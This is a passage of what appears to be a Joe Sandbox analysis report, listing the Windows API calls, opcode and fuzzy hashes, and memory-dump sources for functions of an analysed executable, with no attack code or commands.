        • Opcode ID: 67d598979932f0fc50ee05e8b58ef0d954a4036817706f6ce472bf5fbad3bf78
        • Instruction ID: 8545d21528b9e0b9151562f8f33cf6984e12002caef7b41978b4be84154c587e
        • Opcode Fuzzy Hash: 67d598979932f0fc50ee05e8b58ef0d954a4036817706f6ce472bf5fbad3bf78
        • Instruction Fuzzy Hash: D9411431210604AFDB109F24D888BAEB7E9EF46324F188099F9199B291C770BD91CBE1
        APIs
          • Part of subcall function 0024DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0024CF22,?), ref: 0024DDFD
          • Part of subcall function 0024DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0024CF22,?), ref: 0024DE16
        • lstrcmpiW.KERNEL32(?,?), ref: 0024CF45
        • MoveFileW.KERNEL32(?,?), ref: 0024CF7F
        • _wcslen.LIBCMT ref: 0024D005
        • _wcslen.LIBCMT ref: 0024D01B
        • SHFileOperationW.SHELL32(?), ref: 0024D061
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
        • String ID: \*.*
        • API String ID: 3164238972-1173974218
        • Opcode ID: ec74da9a5aa61b6f4568f0de53113000eb672be1ba8b0d957bcad977f5af8051
        • Instruction ID: 5f83144a87b17275691cbe54199a8b80a1c58137a4b91fc9576c57ecfff34fbd
        • Opcode Fuzzy Hash: ec74da9a5aa61b6f4568f0de53113000eb672be1ba8b0d957bcad977f5af8051
        • Instruction Fuzzy Hash: A941A9719562199FDF16EFA4D981EDEB7B8AF04340F1100E6E509EB142EB34AA98CF10
        APIs
        • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00272E1C
        • GetWindowLongW.USER32(?,000000F0), ref: 00272E4F
        • GetWindowLongW.USER32(?,000000F0), ref: 00272E84
        • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00272EB6
        • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00272EE0
        • GetWindowLongW.USER32(?,000000F0), ref: 00272EF1
        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00272F0B
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: LongWindow$MessageSend
        • String ID:
        • API String ID: 2178440468-0
        • Opcode ID: b1e62178faac38a71ee29699f2e2d1a8d226ff90522846c648cdad8f85f930de
        • Instruction ID: 27df382bd67be7cf428175bd40023318fb837cccf19f1c7a9c178355ac2288c2
        • Opcode Fuzzy Hash: b1e62178faac38a71ee29699f2e2d1a8d226ff90522846c648cdad8f85f930de
        • Instruction Fuzzy Hash: 26311530614151DFDB21CF18EC98F6537E4EB8A710F154168F9489B2B2CB71B8A4DB41
        APIs
        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00247769
        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0024778F
        • SysAllocString.OLEAUT32(00000000), ref: 00247792
        • SysAllocString.OLEAUT32(?), ref: 002477B0
        • SysFreeString.OLEAUT32(?), ref: 002477B9
        • StringFromGUID2.OLE32(?,?,00000028), ref: 002477DE
        • SysAllocString.OLEAUT32(?), ref: 002477EC
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
        • String ID:
        • API String ID: 3761583154-0
        • Opcode ID: 90f905d394d87fd39094b2fe4eb82649506ace318eeaff81de176339e4aa1801
        • Instruction ID: 2ab4fa2322b9eac879f85c1df8f2be4ea06eded4aa9ba310b9202ea9fe3b9c47
        • Opcode Fuzzy Hash: 90f905d394d87fd39094b2fe4eb82649506ace318eeaff81de176339e4aa1801
        • Instruction Fuzzy Hash: 3021B276614219AFDB14EFB8DC88CBBB7ACEB093647508029FA29DB151D770DC8187A0
        APIs
        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00247842
        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00247868
        • SysAllocString.OLEAUT32(00000000), ref: 0024786B
        • SysAllocString.OLEAUT32 ref: 0024788C
        • SysFreeString.OLEAUT32 ref: 00247895
        • StringFromGUID2.OLE32(?,?,00000028), ref: 002478AF
        • SysAllocString.OLEAUT32(?), ref: 002478BD
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
        • String ID:
        • API String ID: 3761583154-0
        • Opcode ID: bfabe6d0323c8ca2f76170b2799c20ae9b75085f502b1b7c97af9e2fec2ea366
        • Instruction ID: 3fba38d4b2bb35f691b8ea3341a0706f0b0daa50c0b1c5a7e4f2a5bb19f1a14d
        • Opcode Fuzzy Hash: bfabe6d0323c8ca2f76170b2799c20ae9b75085f502b1b7c97af9e2fec2ea366
        • Instruction Fuzzy Hash: 74218331618205AFDB14AFB8DC8CDBA77ECEB097607108129F929DB2A1D770DC81DB64
        APIs
          • Part of subcall function 001E600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001E604C
          • Part of subcall function 001E600E: GetStockObject.GDI32(00000011), ref: 001E6060
          • Part of subcall function 001E600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 001E606A
        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00274112
        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0027411F
        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0027412A
        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00274139
        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00274145
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: MessageSend$CreateObjectStockWindow
        • String ID: Msctls_Progress32
        • API String ID: 1025951953-3636473452
        • Opcode ID: 6bebd049d7f5ff5853a29ff710a2f609de9d9e6b17378f109338a058a1320274
        • Instruction ID: 3e8a2f55fe50c40dc8acf5f8d2e518d730f9b34d90fd6352964ac2fc4c4c9ef4
        • Opcode Fuzzy Hash: 6bebd049d7f5ff5853a29ff710a2f609de9d9e6b17378f109338a058a1320274
        • Instruction Fuzzy Hash: 0B11B2B215022ABEEF119F64CC85EE77F9DEF19798F108110BA18A2050CB729C61DBA4
        APIs
          • Part of subcall function 0021D7A3: _free.LIBCMT ref: 0021D7CC
        • _free.LIBCMT ref: 0021D82D
          • Part of subcall function 002129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0021D7D1,?,00000000,?,00000000,?,0021D7F8,?,00000007,?,?,0021DBF5,?), ref: 002129DE
          • Part of subcall function 002129C8: GetLastError.KERNEL32(?,?,0021D7D1,?,00000000,?,00000000,?,0021D7F8,?,00000007,?,?,0021DBF5,?,?), ref: 002129F0
        • _free.LIBCMT ref: 0021D838
        • _free.LIBCMT ref: 0021D843
        • _free.LIBCMT ref: 0021D897
        • _free.LIBCMT ref: 0021D8A2
        • _free.LIBCMT ref: 0021D8AD
        • _free.LIBCMT ref: 0021D8B8
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: _free$ErrorFreeHeapLast
        • String ID:
        • API String ID: 776569668-0
        • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
        • Instruction ID: ba90cf6f8a3222361cefc51394e5b7f464c27823bf1b8bb615d0df89b9dcaae2
        • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
        • Instruction Fuzzy Hash: 74115171560B08EAD521BFB0CC47FCBBBDC6F20710F440825B299AA0D2DAA5B5B64E50
        APIs
        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0024DA74
        • LoadStringW.USER32(00000000), ref: 0024DA7B
        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0024DA91
        • LoadStringW.USER32(00000000), ref: 0024DA98
        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0024DADC
        Strings
        • %s (%d) : ==> %s: %s %s, xrefs: 0024DAB9
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: HandleLoadModuleString$Message
        • String ID: %s (%d) : ==> %s: %s %s
        • API String ID: 4072794657-3128320259
        • Opcode ID: 38d0c8f38dfcfd55163cf143f05cb5aace4f6752726259b9472230c5fd682bda
        • Instruction ID: e34da1b7bb277d7cc86f863b5ef42d4ba7ec16603bc388f8af5ddc5ad4e85a35
        • Opcode Fuzzy Hash: 38d0c8f38dfcfd55163cf143f05cb5aace4f6752726259b9472230c5fd682bda
        • Instruction Fuzzy Hash: 340162F29102087FE711ABB4AD8DEE7766CE708705F5044AAB74AE2041EA749EC44F74
        APIs
        • InterlockedExchange.KERNEL32(0104DF40,0104DF40), ref: 0025097B
        • EnterCriticalSection.KERNEL32(0104DF20,01077B90), ref: 0025098D
        • TerminateThread.KERNEL32(?,000001F6), ref: 0025099B
        • WaitForSingleObject.KERNEL32(?,000003E8), ref: 002509A9
        • CloseHandle.KERNEL32(?), ref: 002509B8
        • InterlockedExchange.KERNEL32(0104DF40,000001F6), ref: 002509C8
        • LeaveCriticalSection.KERNEL32(0104DF20), ref: 002509CF
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
        • String ID:
        • API String ID: 3495660284-0
        • Opcode ID: 6b4490229be6e1758e5fb785228b9544ee6865407f43ec278c7ca448d045a453
        • Instruction ID: 218b3839ca71837653f830e8e13aa9dff87bdd3f686f6c2048cf204768af7d94
        • Opcode Fuzzy Hash: 6b4490229be6e1758e5fb785228b9544ee6865407f43ec278c7ca448d045a453
        • Instruction Fuzzy Hash: 68F01D32442502ABD7415FA4EE8CAD6BB25BF01702F501029F605608A5C774A4B5CF94
        APIs
        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00261DC0
        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00261DE1
        • WSAGetLastError.WSOCK32 ref: 00261DF2
        • htons.WSOCK32(?,?,?,?,?), ref: 00261EDB
        • inet_ntoa.WSOCK32(?), ref: 00261E8C
          • Part of subcall function 002439E8: _strlen.LIBCMT ref: 002439F2
          • Part of subcall function 00263224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0025EC0C), ref: 00263240
        • _strlen.LIBCMT ref: 00261F35
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
        • String ID:
        • API String ID: 3203458085-0
        • Opcode ID: 6e9bccf6d3087539d7c5614c61e23416b1492518fca2faa2eff44b312b7d2f0b
        • Instruction ID: 40d45794239972e0ec2e867f3e40fb51a3d2d368d79abd0f4034846230a7c4e2
        • Opcode Fuzzy Hash: 6e9bccf6d3087539d7c5614c61e23416b1492518fca2faa2eff44b312b7d2f0b
        • Instruction Fuzzy Hash: 9AB1E230614741AFC324DF24C885E2A7BE5AF94318F58894CF55A5F2E2CB71ED92CB92
        APIs
        • GetClientRect.USER32(?,?), ref: 001E5D30
        • GetWindowRect.USER32(?,?), ref: 001E5D71
        • ScreenToClient.USER32(?,?), ref: 001E5D99
        • GetClientRect.USER32(?,?), ref: 001E5ED7
        • GetWindowRect.USER32(?,?), ref: 001E5EF8
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Rect$Client$Window$Screen
        • String ID:
        • API String ID: 1296646539-0
        • Opcode ID: 7e206718546b467c126349f25848295de8218e8095656ed4fd69c23bc8b7aaef
        • Instruction ID: 4b6e905344d02af4de50c60e2073efc4d407f6e89e2b85589f7d10fbcf40bcda
        • Opcode Fuzzy Hash: 7e206718546b467c126349f25848295de8218e8095656ed4fd69c23bc8b7aaef
        • Instruction Fuzzy Hash: 92B16A35A10A8ADBDB14DFA9C4807EEB7F2FF48314F14841AE8A9D7250DB30AA51DB54
        APIs
        • __allrem.LIBCMT ref: 002100BA
        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002100D6
        • __allrem.LIBCMT ref: 002100ED
        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0021010B
        • __allrem.LIBCMT ref: 00210122
        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00210140
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
        • String ID:
        • API String ID: 1992179935-0
        • Opcode ID: ccfe033e8101dea64483168ec7d1bf08fe1e646c0a9524ac27cf74612a55c325
        • Instruction ID: d268762fd4d093bcef771d11a268641e155c0d3221056f7c3b84236b60a7dc71
        • Opcode Fuzzy Hash: ccfe033e8101dea64483168ec7d1bf08fe1e646c0a9524ac27cf74612a55c325
        • Instruction Fuzzy Hash: 6A811B71A20707ABE7309E68CC81BAB73E89F65324F244139F455D6AC1E7B4D9E08B90
        APIs
        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,002082D9,002082D9,?,?,?,0021644F,00000001,00000001,8BE85006), ref: 00216258
        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0021644F,00000001,00000001,8BE85006,?,?,?), ref: 002162DE
        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 002163D8
        • __freea.LIBCMT ref: 002163E5
          • Part of subcall function 00213820: RtlAllocateHeap.NTDLL(00000000,?,?,?,001FFDF5,?,?,00250832,0000FFFF), ref: 00213852
        • __freea.LIBCMT ref: 002163EE
        • __freea.LIBCMT ref: 00216413
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ByteCharMultiWide__freea$AllocateHeap
        • String ID:
        • API String ID: 1414292761-0
        • Opcode ID: 0734759781f3918cac7cfd3574d3f90f96f3d2cb518eb3be32c3211c146b8b20
        • Instruction ID: 3ce9d3883366302e4865710ee30a4b0637ec6412c640726660d96621e879bbf8
        • Opcode Fuzzy Hash: 0734759781f3918cac7cfd3574d3f90f96f3d2cb518eb3be32c3211c146b8b20
        • Instruction Fuzzy Hash: 1851E572620217ABDB258FA4DC89EEF77EAEB64B10F254269FC15D6140DB34DCE0C660
        APIs
          • Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD
          • Part of subcall function 0026C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0026B6AE,?,?), ref: 0026C9B5
          • Part of subcall function 0026C998: _wcslen.LIBCMT ref: 0026C9F1
          • Part of subcall function 0026C998: _wcslen.LIBCMT ref: 0026CA68
          • Part of subcall function 0026C998: _wcslen.LIBCMT ref: 0026CA9E
        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0026BCCA
        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0026BD25
        • RegCloseKey.ADVAPI32(00000000), ref: 0026BD6A
        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0026BD99
        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0026BDF3
        • RegCloseKey.ADVAPI32(?), ref: 0026BDFF
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
        • String ID:
        • API String ID: 1120388591-0
        • Opcode ID: 14979d6dab020241feb6d337da5bc229dfef7495d7e330fdf45d81d81a237f27
        • Instruction ID: 90844bdb93a878880829a6b9b40744ba1927dcb70795fe195608ad53d730db5c
        • Opcode Fuzzy Hash: 14979d6dab020241feb6d337da5bc229dfef7495d7e330fdf45d81d81a237f27
        • Instruction Fuzzy Hash: BF81D230218241EFC715DF24C885E2ABBE5FF84308F54895DF5598B2A2DB32ED95CB92
        APIs
        • VariantInit.OLEAUT32(00000035), ref: 0023F7B9
        • SysAllocString.OLEAUT32(00000001), ref: 0023F860
        • VariantCopy.OLEAUT32(0023FA64,00000000), ref: 0023F889
        • VariantClear.OLEAUT32(0023FA64), ref: 0023F8AD
        • VariantCopy.OLEAUT32(0023FA64,00000000), ref: 0023F8B1
        • VariantClear.OLEAUT32(?), ref: 0023F8BB
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Variant$ClearCopy$AllocInitString
        • String ID:
        • API String ID: 3859894641-0
        • Opcode ID: 579c2157dc2cb00d8dbf5ff87e8358c721ff473c5f531228f9974d58dad527d5
        • Instruction ID: 354e848e926570af3f3c0ce9d884e04abbeca0be5066543ab6982e0ea208aa7b
        • Opcode Fuzzy Hash: 579c2157dc2cb00d8dbf5ff87e8358c721ff473c5f531228f9974d58dad527d5
        • Instruction Fuzzy Hash: C951F8B1D30301BACF54AF65F995B29B3A4EF55310F20546BE905DF291DBB08C60CB56
        APIs
          • Part of subcall function 001E7620: _wcslen.LIBCMT ref: 001E7625
          • Part of subcall function 001E6B57: _wcslen.LIBCMT ref: 001E6B6A
        • GetOpenFileNameW.COMDLG32(00000058), ref: 002594E5
        • _wcslen.LIBCMT ref: 00259506
        • _wcslen.LIBCMT ref: 0025952D
        • GetSaveFileNameW.COMDLG32(00000058), ref: 00259585
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: _wcslen$FileName$OpenSave
        • String ID: X
        • API String ID: 83654149-3081909835
        • Opcode ID: a304ec6675be72f6a70acbccc3ed2ab2ca7559bf4c19a800d96b793c835ae85b
        • Instruction ID: 8e56468212fdeafe2ddea866d6235da187ef2e1b0ad87ffc1cf92e48bb96f6f4
        • Opcode Fuzzy Hash: a304ec6675be72f6a70acbccc3ed2ab2ca7559bf4c19a800d96b793c835ae85b
        • Instruction Fuzzy Hash: 10E1E330518741DFC724EF25C881A6EB7E4BF94314F14896CF8899B2A2EB30DD59CB92
        APIs
          • Part of subcall function 001F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001F9BB2
        • BeginPaint.USER32(?,?,?), ref: 001F9241
        • GetWindowRect.USER32(?,?), ref: 001F92A5
        • ScreenToClient.USER32(?,?), ref: 001F92C2
        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 001F92D3
        • EndPaint.USER32(?,?,?,?,?), ref: 001F9321
        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 002371EA
          • Part of subcall function 001F9339: BeginPath.GDI32(00000000), ref: 001F9357
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
